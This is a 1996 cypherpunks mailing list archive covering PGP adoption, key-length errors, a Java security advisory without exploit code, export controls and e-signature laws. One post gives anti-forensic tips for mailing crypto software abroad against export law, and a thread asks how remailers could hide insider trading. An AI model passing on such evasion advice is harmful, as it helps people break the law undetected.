To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
In-Reply-To: <199606030902.FAA27168@unix.asb.com>
Message-ID: <Pine.LNX.3.91.960604005849.2051A-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Deranged Mutant wrote:

> On  2 Jun 96 at 21:15, Lucky Green wrote:
> 
> > That PGP is ubiquitous is subject to discussion. PGP is widely available, 
> > but that doesn't mean that it is widely used. What percentage of email is 
> > PGP encrypted? Less than half a percent?
> 
> In part because it's not well integrated with mailers.  That could 
> change with a PGP3 DLL.

I think that is the main reason PGP is not more common place. If it was 
seamlessly integrated with Windows software such as mailers I am sure it 
would be used widely. It will be interesting to see if this develops.

 
> PGP isn't only used for email:
> 
>  o files distributed over the net that are PGP-signed
>  o signed email
>  o non-emailed file distributions (over BBS, or physical
>     transfer of disks)
>  o personal storage (though other utilities are better-suited
>     for that than PGP)
>  o related utilities that make use of PGP-keys (HPack
>     archiver)
> 
> The reasons PGP hasn't become widely used are because of it's lack of 
> user-friendliness and poor integration into other tools

I think it is actually easy to use, although granted others may not; but 
that people tend not to use it as a matter of course (and it is my belief 
this is a desireable thing) due too the time taken to manually sign mail 
or sign and encrypt. Lets face it the average user has trouble with a 
dos command prompt and until there is a point and click emailer easily 
available most people just won't try PGP for email. It would also raise 
the general awareness of PGP and encryption and privacy issues I hope as 
it is my experience that outside the dedicated and the interested, very 
few have even heard of PGP or realise that their email may be read easily 
by persons other than the intended recipient. If this should occurr the 
horse would have bolted as far as any attempts at government outlawing 
its use; by and large; or at the very least would make it impossible to 
pass laws banning PGP without the public at large realising that they 
might possibly be loosing something which at the moment I doubt many 
would having never used encryption for email.


-- 
   .////.   .//    Charles Senescall            apache@quux.apana.org.au
 o:::::::::///                                         apache@gil.com.au
>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
   '\\\\\'   \\    http://quux.apana.org.au/~apache/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Tue, 4 Jun 1996 14:03:08 +0800
To: cypherpunks@toad.com
Subject: The problem with encryption, period.
Message-ID: <19960604020034.30122.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


The problem with encryption is that 1) it takes effort, and so 2) you
must have a non-empty threat model.  With (2), you have to trust that
you're really encrypting, which takes 3) a certain sense of paranoia.

For most people, all three are lacking, which is why proposals like
s/mime are succeeding.  One button, no security, encryption.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregmi@galileo.mis.net (Greg Miller)
Date: Tue, 4 Jun 1996 15:12:40 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <199606030447.XAA22063@manifold.algebra.com>
Message-ID: <31b3a6b6.17653093@pop.mis.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 2 Jun 1996 23:47:32 -0500 (CDT), you wrote:

>Another question: what happens to the ecash issued by a bank if it's
>secret keys get stolen?

	The same thing that would happen if someone were to steal the keys to
the bank, and the combination to the vault.


"Randomness is in the eye of the beholder" --Numerical Recipes
gregmi@mis.net (Greg Miller)
http://grendel.ius.indiana.edu/~gmiller/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 4 Jun 1996 17:08:37 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031507.LAA15317@jafar.sware.com>
Message-ID: <Pine.3.89.9606040351.A7487-0100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain


	Jeff:

On Mon, 3 Jun 1996, Jeff Barber wrote:
> IANAL, but I think you must be wrong about this, Perry.  If this were

	Tim is calling any trade by an Insider, as being insider trading.
	Perry is saying anybody can do insider trading. 
	

> the case then, as an employee of company XYZ, I would never be permitted
> to buy XYZ stock (which is clearly not the case) since I *always* have

	An Insider may trade stock. s/he simply has to announce 
	their intention to do so 30 or more days beforehand.
	<< I probably have the number of days wrong, but it is 
	at least 30.  >> 

	From my little black legal dictionary:

	Insider:   Defined in Securities and Exchagnes Act.
		   15 USC 78p(a) ( 1964)

		   An insider is every officer and director of a 
		corporation and any person who owns more than
		ten percent of the stock of taht corporation.

	Insider Trading:   Buying or selling corporate stock by 
  			   by a corporate officer or other insider 
		who profits by his access to information not available
		to the public.  << Skip several paragraphs >> The prohibition
		against trading on inside inforamtion is enforced regardless
		of whether the trading is done by an insider, or by an
		unscrupulous investor who has been tipped off by an insider.

		*** end of legal defination ***

		I don't have legal citations, but I do remember a scandal
		in the sixties, involving secretaries passing information
		on to others, who were convicted of insider trading,
		amongst other things. << Not the secretaries, but those
		they passed information onto, were convicted. >>

		Then for those who believe that TV is real life, at
		least one episode of LA Law dealt with insider trading 
		--- a secretary << I think -- I don't watch TV >> was
		getting stock tips from an insider, and traded on that
		advice.  She hadn't a clue as to what she was doing,
		but made a pretty penny. And was arrested for Insider 
		Trading.  She didn't even know taht that was what she
		was doing.  << First aired three or four season's ago,
		I think.  >> 

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 4 Jun 1996 19:39:33 +0800
To: cypherpunks@toad.com
Subject: Re: CWD: "Jacking in from the "One that Got Away" Port
Message-ID: <199606040831.EAA12343@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jun 96 at 22:19, Declan McCullagh wrote:

> (By Brock Meeks / brock@well.com / Archived at http://www.cyberwerks.com/)
>  CyberWire Dispatch // Copyright (c) 1996 //
>  Jacking in from the "One that Got Away" Port:
[..]
>  That key length stuff is just so much gibberish to those playing
>  without a scorecard, so let me drill down on it for you.  Basically,
>  the longer the key length, the harder it is for a message to be broken
>  by "brute force" automated attacks.  Current U.S. laws prohibit the
>  export of any encryption device with a key length longer than 40-bits,
>  or roughly the equivalent of  Captain Crunch decoder ring. For hardcore
>  math types, I'm told that a 1024-bit key length is 10 to the 296th
>  power more difficult to break than 40 bits.

Too bad he got caught up in the gibberish.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 4 Jun 1996 20:55:12 +0800
To: cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <199606040833.EAA12366@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jun 96 at 21:59, Deranged Mutant wrote:
[..]
> More likely drop it altogether, or be openly admit they were forced 
> to include GAK (people will want the source, anyway).

I retract the second part of that sentence.

*Sigh*

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 4 Jun 1996 17:34:47 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: DEMOGRAPHICS v. ANONYMITY
In-Reply-To: <2.2.32.19960603171454.00717340@popmail.crl.com>
Message-ID: <Pine.3.89.9606040436.A7487-0100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Sandy Sandfort wrote:

	Not Sandy, but somebody else wrote: 

> >I also shop only with cash, here and elsewhere.  
> >Double-blinded e-cash will be the only way to go, if it 
> And I bet they don't turn down your cash just because it
> contains no demographic data.  Thus demonstrating the 

	If that purchase is for more than $5K, they will turn
	down your cash, unless you also provide
	#1:	Your name
	#2:	Your Address
	#3:	Proof of Identity.

	Reason: 	 _current_ IRS Requirements. 

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 5 Jun 1996 01:54:09 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: CWD: "Jacking in from the "One that Got Away" Port
In-Reply-To: <199606040610.XAA02467@mail.pacifier.com>
Message-ID: <Pine.3.89.9606040505.A13202-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, we fucked up here and are getting rightfully flamed.

A more accurate way to say this would be something like:

1024-bit RSA is as hard to crack as three nested iterations of 56-bit DES.
The key length for symmetric-key cryptosystems isn't comparable to the key
length for public key cryptosystems. 

And now that I'm at it, I'm now told that it was a Captain Marvel decoder 
ring.

Apologies, all.

-Declan


> > That key length stuff is just so much gibberish to those playing
> > without a scorecard, so let me drill down on it for you.  Basically,
> > the longer the key length, the harder it is for a message to be broken
> > by "brute force" automated attacks.  Current U.S. laws prohibit the
> > export of any encryption device with a key length longer than 40-bits,
> > or roughly the equivalent of  Captain Crunch decoder ring. For hardcore
> > math types, I'm told that a 1024-bit key length is 10 to the 296th
> > power more difficult to break than 40 bits.
> 
> I sure do wish they'd get things like this a bit more accurate...  Oh, well, 
> I suppose it doesn't really matter...
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 5 Jun 1996 02:31:02 +0800
To: ichudov@algebra.com
Subject: Re: Anonymous stock TRADING (was Saw this on CNN: )
In-Reply-To: <199606040240.VAA31145@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960604082925.19633A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996 ichudov@algebra.com wrote:

> rick hoselton wrote:
> > 
> > You might also want to ask Ivan Boeskey(sp?).  I think he's out of 
> 
> Boesky.
> 
> Which brings up another ignorant question: suppose that I am a 
> corporate officer who does receive substantial "insider" information,
> for example results of audits, before they become public. What would
> prevent such an insider from creating a phony offshore trading company,
> and sending orders to that company using cypherpunks technology? 

The threat of discovery and punishment?
Your mileage may vary.

> If we suppose that the agent executing trades (which may even be a
> computer, afaik) is trustworthy, the methods to deliver trade orders are
> reliable, the computers are protected from van eyck monitoring, and the
> officer is not spending too much money openly, what is there to prevent
> or prove such violations of the law?

Paper trails, informants, corrupt foreign officials, plants, attacks on 
voice calls between the U.S. and the company, the internal corporate calls.

Anything that law enforcement is used to using.

It'd be the IRS that you had to really watch for.  SEC tends to give up 
on said programs.

I discuss concealing insider trading in my longish work on the subbject 
of asset concealing.

> For example, the trading computer can have pseudonym address
> xyz@alpha.c2.org, forwarded through a chain of remailers to
> place_order@offshore.com.xx, and the officer sends pgp signed and
> encrypted trade orders to that address, again through remailers.  What
> besides traffic analysis is there to stop such violations?
> 
> Thanks,
> 
> 	- Igor.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 10:54:42 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Java Crypto API questions
Message-ID: <199606041554.IAA23220@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 PM 6/3/96 -0700, Lucky Green wrote:
>At 16:22 6/3/96, jim bell wrote:
>
>>A signature is just that:  A signature.  It doesn't encrypt or decrypt.  It
>>doesn't even ALLOW the system it's in to encrypt or decrypt, because there
>>are numerous encryption programs written that have no need for such a
>>signature.  If no program existed which _used_ that signature, nobody would
>>think twice about exporting it.
>>
>>The fact is, it is LEGAL to import encryption code into the US.  It is LEGAL
>>to generate an hash of that code, and it is LEGAL to export that hash.  To
>>believe otherwise is to broadly expand the scope of export laws far beyond
>>what they were intended to mean.
>
>First, the ITAR are not laws, but regulations. Second, there are many that
>believe that applying ITAR to crypto software is already expanding the
>scope of the regulations far beyond what they were intended to mean.

I agree.  Which is why I think any acquiescence by Microsoft on the subject 
of exportability of signatures is wrong.  Let the government press its case, 
if it wants to try.  Don't assist it, even rhetorically.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 02:21:19 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <199606040508.AAA01035@manifold.algebra.com>
Message-ID: <199606041254.IAA08918@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home writes:
> Actually factoring is not exponential even now. For Number Fiels Sieve 
> method the number of operations is estimated as
> 
> N ~= exp(((1.923+O(1)) * (ln n)^(1/3) * ln ln n)^(2/3))
> 
> (taken from Schneier, A.C., page 256)

The distinction between that and exponential is rather difficult for
most ordinary people to see, and in any case subexponential and
exponential are "practically the same" for purposes of this
discussion.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 01:49:13 +0800
To: cypherpunks@toad.com
Subject: Alan Coopersmith: BoS: Yet Another Java security bug
Message-ID: <199606041258.IAA08929@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

From: lady0065@sable.ox.ac.uk (David Hopwood)
Newsgroups: comp.lang.java,comp.security.misc,comp.security.unix
Subject: Another Java security bug
Date: 2 Jun 1996 07:15:06 GMT
Organization: Oxford University, England
Lines: 30
Sender: david.hopwood@lmh.ox.ac.uk
Message-ID: <4orf1q$t6f@news.ox.ac.uk>

There is another serious security bug in the class loading code for all
currently available Java browsers:
    Netscape up to and including versions 2.02 and 3.0beta4 (except for
      Windows 3.x)
    Oracle PowerBrowser for Win32
    HotJava 1.0beta
    'appletviewer' from the Java Development Kit, up to and including
      version 1.0.2

Sun, Netscape, and Oracle have been sent details of the problem (which is
partly related to the ClassLoader attack found by Drew Dean et al in
March). The attack works by exploiting a design flaw in the mechanism that
separates JVM classes into different namespaces.

Using this bug, an attacker can bypass all of Java's security
restrictions. This includes executing native code on the client, with
the same permissions as the user of the browser. No preconditions are
necessary other than viewing the attacker's web page, and the process
can be made completely invisible to the victim.

The only way to avoid this problem at the moment is to disable Java. For
more information see
    http://ferret.lmh.ox.ac.uk/~david/java/bugs/

Further technical details will be posted when Sun, Netscape, and Oracle
release patches.

David Hopwood
david.hopwood@lmh.ox.ac.uk
http://ferret.lmh.ox.ac.uk/~david/

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 5 Jun 1996 03:00:22 +0800
To: cypherpunks@toad.com
Subject: Paper about electronic cash and common currencies available
Message-ID: <v03006f06add9e3fc6e3a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Wolfgang Roeckelein <wolfgang.roeckelein@wiwi.uni-regensburg.de>
Mime-Version: 1.0 (NeXT Mail 3.3 v118.2)
Precedence: Bulk
Date: Tue,  4 Jun 96 11:14:41 +0200
From: Wolfgang Roeckelein <wolfgang.roeckelein@wiwi.uni-regensburg.de>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Paper about electronic cash and common currencies available

Hello everybody,

our paper titled

"A Common Currency System for Spontaneous Transactions on Public Networks"

is available online under

http://www.whu-koblenz.de/~wolfgang/CommonCurrency/

Perhaps somebody might be interested.

Thank you for your attention,
  Wolfgang Roeckelein
---
Dipl.-Wirtsch.Inf.	Voice:	+49 941 943 2998
Wolfgang Roeckelein	Fax:	+49 941 943 4986
Uni Regensburg		E-Mail:	roeckelein@wi.whu-koblenz.de
Universitaetsstr. 31		Wolfgang.Roeckelein@wiwi.uni-regensburg.de
D-93053 Regensburg		(MIME and NeXTmail ok)
Germany			WWW:	http://www.whu-koblenz.de/~wolfgang/
GCM/B d-- s: a- C++ US+++$ UX+++ P+ L E? W++ N++ w-- O-(++) M+ !V PS++ PE
Y+ PGP(++) t+ 5? X? R+ tv b++ DI D++ G e+++>++++ h+ r++>% y? (Geek Code
V3.x)


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 03:30:20 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Java
In-Reply-To: <199606040626.XAA09729@netcom7.netcom.com>
Message-ID: <199606041306.JAA08943@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> At 10:22 PM 6/3/96 -0400, Perry E. Metzger wrote:
> >I've been rather hard on Java here lately.
> 
> I'll say.  You have also ignored some of Java's other features.  Machine
> independence is probably the most important.

Many languages are machine independent. Thats hardly a new feature.

> A nice, small, easy to learn language is another.

Scheme, anyone?

However, your point is taken. Java is a neat little language in many
ways. However, that isn't cause enough for literally fifty books on
the subject to be on display, including breathless ones proclaiming
"Tips from experienced Java programmers!" as if there are any in the
world at this point. There are dozens of cute little languages in the
world -- scheme, smalltalk, etc, etc.

I mean, with all the "Teach yourself Java in 21 days" and company
books coming out, you would think you were dealing witht he major
application programming language for the world instead of something
that at the moment is used for almost nothing more interesting than
fake scrolling LED sign applets.

> If you want defense in depth, run your Java interpreter in an OS
> environment which limits the interpreter's access to only those resources
> you wish it to access.

Since that doesn't exist, it isn't an option for my users. It is not,
in any case, my obligation to make Java secure. I'm not the one hyping
it.

> >Beyond that, however, they have created the ultimate hype
> >monster. Java is a neat idea looking for a good application. I use the
> >web all day long and I have yet to see a good use for Java.
> 
> There have been discussions of crypto applications in Java.

Useless, almost, for a web environment.

If you want to really put Crypto in netscape, the plugin facilities
and a good C compiler are a better tool, and C is 99% portable.

> While, as a number of us have pointed out, there are problems
> doing crypto with Java, it may be the easiest way to deliver strong crypto
> quickly to Joe Websurfer.

You could hand any websurfer a Netscape PGP plugin without much work
at all, and you could easily build it on lots of platforms. After all,
look at how many platforms that lowly C code like PGP runs on.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 11:12:37 +0800
To: cypherpunks@toad.com
Subject: Re: NYT on NTT/RSA Chips
Message-ID: <199606041616.JAA24515@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 6/4/96 GMT, John Young wrote:
>Connecting Declan's three dots [...]: 
>   The New York Times, June 4, 1996, pp. D1, D4. 
>   Japanese Chips May Scramble U.S. Export Ban 
>   By John Markoff 
>   Washington, June 3 -- The Nippon Telegraph and Telephone 
>   Corporation has quietly begun selling a powerful data- 
>   scrambling chip set that is likely to undermine the Clinton 
>   Administration's efforts to restrict the export of the 
>   fundamental technology for protecting secrets and commerce 
>   in the information age. 

 
>   An executive at NTT America said that although there were 
>   no restrictions on the export of cryptographic hardware or 
>   software from Japan, his company was still anxious to 
>   obtain software from RSA Data to use in its chips. That 
>   software is still controlled by United States export law, 
>   he said. 


Maybe it's just me, but the solution to NTT's problem is obvious.  Even 
assuming that the export of this software would be against the law, why 
doesn't somebody simply violate that law?  RSA would publish that software, 
possibly encrypted with NTT's public key, on a public system protected 
against direct export.  "Somebody" would download it, write it to a floppy 
(taking care not to leave any fingerprints, and wetting both the stamp and 
the envelope with tap water, rather than licking them) and mail that floppy 
off to NTT in Japan.  (Naturally, you don't put a return address on that 
envelope.   The truly paranoid would first take that floppy to some store's 
PC section, and cross-load the data onto a floppy written by some other 
floppy drive.)

NTT finds that envelope in their mail, opens it, reads the floppy, decrypts 
the data, and say, "Wow!  It's the data we wanted to get!"  It verifies that 
the data is valid by emailing a copy back to RSA in America, who say, 
"Amazing!  Somebody has illegally exported our software!"

As far as I know, there is nothing wrong with NTT using this software even 
if it is assumed to have been exported illegally.  Obviously, NTT won't 
_ask_ for somebody to do this, because then the government will claim it was 
all a conspiracy, but that doesn't prevent NTT from being the beneficiary of 
somebody else's activities.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 02:51:03 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: CWD: "Jacking in from the "One that Got Away" Port
In-Reply-To: <Pine.3.89.9606040505.A13202-0100000@well>
Message-ID: <199606041331.JAA09003@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh writes:
> The key length for symmetric-key cryptosystems isn't comparable to the key
> length for public key cryptosystems. 

You should have stuck with that.

> 1024-bit RSA is as hard to crack as three nested iterations of 56-bit DES.

Unknown. Cracking 3DES and 1024 bit RSA are both hard, but the
algorithms used for brute forcing both of them are very different. I
would say that making comparisons between them is probably in general
a bad idea, especially given that over long periods of time the
techniques used improve at different rates.

The conservative attitude is, in any case, always "encrypt until it
hurts and then back off a little bit."

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 5 Jun 1996 11:15:41 +0800
To: perry@piermont.com
Subject: Re: Electronic Signature Act Of 1996
Message-ID: <2.2.32.19960604165840.00725e30@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 11:11 AM 6/4/96 -0400, Perry E. Metzger wrote:

>...I get the impression that under the common law, an ink 
>signature is merely a demonstration that a party assented 
>to a contract, and except for certain contracts (which 
>usually require witnesses etc.) there is no requirement in 
>the law that a contract even be on paper...

The "Statute of Frauds" lists the exceptions and they cover
most important contracts.  I seem to recall that contracts
over a given amount or for interests in real property for 
periods of a year or more are covered.  I'm sure someone 
with current access to legal research resources will post
a better explanation.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 5 Jun 1996 05:17:31 +0800
To: qut@netcom.com
Subject: Re: your mail
In-Reply-To: <199606040046.RAA17821@netcom6.netcom.com>
Message-ID: <Pine.SCO.3.93.960604095742.10472A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996 qut@netcom.com wrote:

> ncr terminals are the most 31173 D0Dz
> 

Sheesh!  Come up with a better backwards/upside-down spelling of "elite," 
will ya?  "31173" is pretty lame (as, it would seem, are you), considering
you ought to be able to use extended and international character sets..... 

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Wed, 5 Jun 1996 05:00:20 +0800
To: shabbir@vtw.org
Subject: Re: (VTW) BillWatch #48
In-Reply-To: <199606040139.VAA21219@panix3.panix.com>
Message-ID: <v03006f02add9f38467c5@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/enriched

The NRC gets points for putting out a report that will become useful in
the months to come.  The White House gets an 'F' for their handling of
encryption policy.  Even in the face of two expert studies on their policy,
they continue to stick to a failed, unpopular policy.


<<<<

I was at the EPIC conference yesterday (6/3) -- where Whit Diffie, BTW, presented the same argument Steven Cherry gave in this BillWatch  -- but at the end of the EPIC conference we had Scott Charney of DoJ on a panel about what the OECD is doing (pushing Clipper internationally) and we kept going round with him on the administration's pushing of Clipper (N). [One attendee described this as "forum shopping" -- looking for a friendly place to push Clipper.]

There were people battling him over his alleged representation of the USA at the OECD -- claiming he was misrepresenting the country by pushing Clipper.  His response was that the Executive is empowered to do all international meetings/negotiations/....

After the meeting ended it hit me what the problem is and I mentioned it to PRZ.  We're complaining that the Executive has gone rogue -- is disobeying the will of the people.  PRZ likened it to Nixon's war in Cambodia.

So, maybe it's nothing new -- just a new playing field for the same old game.

- Carl




+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme         |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."   |
+-------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 12:05:50 +0800
To: Carl Ellison <shabbir@vtw.org
Subject: Re: (VTW) BillWatch #48
Message-ID: <199606041724.KAA28886@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 AM 6/4/96 -0400, Carl Ellison wrote:

>I was at the EPIC conference yesterday (6/3) -- where Whit Diffie, BTW, 
presented the same argument Steven Cherry gave in this BillWatch  -- but at 
the end of the EPIC conference we had Scott Charney of DoJ on a panel about 
what the OECD is doing (pushing Clipper internationally) and we kept going 
round with him on the administration's pushing of Clipper (N). [One attendee 
described this as "forum shopping" -- looking for a friendly place to push 
Clipper.]
>
>There were people battling him over his alleged representation of the USA 
at the OECD -- claiming he was misrepresenting the country by pushing 
Clipper.  His response was that the Executive is empowered to do all 
international meetings/negotiations/....
>
>After the meeting ended it hit me what the problem is and I mentioned it to 
PRZ.  We're complaining that the Executive has gone rogue -- is disobeying 
the will of the people.  PRZ likened it to Nixon's war in Cambodia.


I have a solution to that problem.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 5 Jun 1996 05:13:20 +0800
To: remailer-operators@c2.org
Subject: Asendmail v0.5beta
Message-ID: <Pine.A32.3.93.960603181502.59148A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



Okay, so i'm an idiot. :)  I ran out the door in such a hurry on friday
that I didn't bother to make the asendmail package globally readable.
Apologies to everyone who tried to get a copy and got a permission denied.

It is now really and truely available from:

http://www.infonex.com/~ncognito/asendmail.tar.gz

Sorry for the hassles. 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 5 Jun 1996 05:37:56 +0800
To: cypherpunks@toad.com
Subject: Electronic Signature Act Of 1996
Message-ID: <Pine.A32.3.93.960604102759.21416A-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


(Condensed from AP article)

Florida now recognizes electronic signatures as legal and binding. In
other words - its okay to sign it by modem.

The electronic Signature Act of 1996 passed the Legislature unanimously
and became law Friday. The law does not specify how an electronic document
must be signed, but it probably will mean coding the text and typed
signature so they cannot be changed by anyone other than the writer. 

California and Utah are the only other states that have laws recognizing
electronic signatures.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 4 Jun 1996 20:57:22 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: CWD: "Jacking in from the "One that Got Away" Port
In-Reply-To: <v01510105add95b2fda0a@[204.62.128.229]>
Message-ID: <31B3F920.31DFF4F5@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> Current U.S. laws prohibit the
